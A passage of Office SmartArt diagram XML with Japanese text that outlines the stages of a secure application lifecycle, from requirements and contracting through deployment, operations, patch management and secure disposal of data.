    <dgm:cxn modelId="{B886C4BA-2115-5941-977B-68503F3F259A}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0"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55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{032DA8D2-9BE0-4649-9E78-DAE10EBC1BB4}" type="presOf" srcId="{A8FE1E1A-0E9D-F34E-B52C-238DC9B81A61}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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00FE48E6-685E-9F42-A009-FA1E3777BFA9}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{B0574093-32C8-C540-80A0-D5614D70DE73}" srcOrd="1" destOrd="0" parTransId="{EBB42F84-1FCA-514D-B4BC-AA55945827F1}" sibTransId="{C034172C-22E7-AE45-BA88-F0043426ED08}"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{C2DC27EF-6BCD-7441-AED6-06191BA94EBD}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{495978F5-5BDE-C748-93A9-15851178704B}" type="presOf" srcId="{A953D82E-BB3B-DC41-A0B6-05A946A57241}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{315013FA-2423-4C43-853A-B455FE00D040}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{6B45A33F-729F-4B42-B2AA-0CE0777007B0}" srcOrd="2" destOrd="0" parTransId="{07A48406-34DD-0844-8F08-6B3184B7C07E}" sibTransId="{CEC217A4-CE54-4F44-A0FD-6E79F9700B79}"/>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全てのデータ資産における機密性、真正性、完全性及び可用性や予想されるビジネスロジックに関する保護要件を含む、アプリケーションに対するビジネス要件を収集し、交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" type="parTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}" type="sibTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>提案依頼書 </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>(RFP)</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>と契約</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>計画と設計</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>開発者や社内の株主や例えばセキュリティ専門家と計画や設計を交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" type="parTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}" type="sibTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>システムの廃棄</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" type="parTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}" type="sibTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>運用には、例えばパッチ管理といったアプリケーションのセキュリティ管理に関するガイドラインを含める。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" type="parTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}" type="sibTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>必要なデータを全てアーカイブし、その他のデータを全て安全に消去する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" type="parTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}" type="sibTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>デプロイ、テスト及び公開</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" type="sibTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" type="parTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>運用及びチェンジマネジメント</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEE799B-7F35-4AE2-93E2-335733E35922}" type="sibTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" type="parTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}">
      <dgm:prSe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必要な権限を含む、アプリケーション、インタフェース、必要な全てのコンポネントのセキュアなデプロイを自動化する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" type="parTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}" type="sibTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>リソース管理の要件</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4929216-EC1A-9F45-93D1-71864BC07AA8}">
      <dgm:prSet phldrT="[Tex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機能及び非機能のセキュリティ要件を含む、技術的な要件を蓄積する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A199C1B9-A313-B142-AF7F-A478D519A3C8}" type="parTrans" cxnId="{A560494C-16CB-1C48-A453-3837AD145956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A35F9B4-04E7-084F-842A-62A1ECBDD1CA}" type="sibTrans" cxnId="{A560494C-16CB-1C48-A453-3837AD145956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC27990C-9BD9-184B-A25A-C04D5EDB5AEC}">
      <dgm:prSet phldrT="[Tex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セキュリティに関する活動を含む、設計、ビルド、テスト及び運用の全ての側面をカバー可能な予算を計画し、交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3514C19B-208C-7A4B-ACB2-521D97E1B24E}" type="parTrans" cxnId="{48BAF57B-63E3-2742-8624-1987E74A58FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC5DD40A-EA5F-B347-8C3B-94A00E39DEA0}" type="sibTrans" cxnId="{48BAF57B-63E3-2742-8624-1987E74A58FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>例えば、ソフトウェア開発ライフサイクルにおけるベストプラクディスといったセキュリティプログラムに関するガイドラインやセキュリティ要件をなど、社内外の開発者と要件を交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}" type="sibTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" type="parTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE">
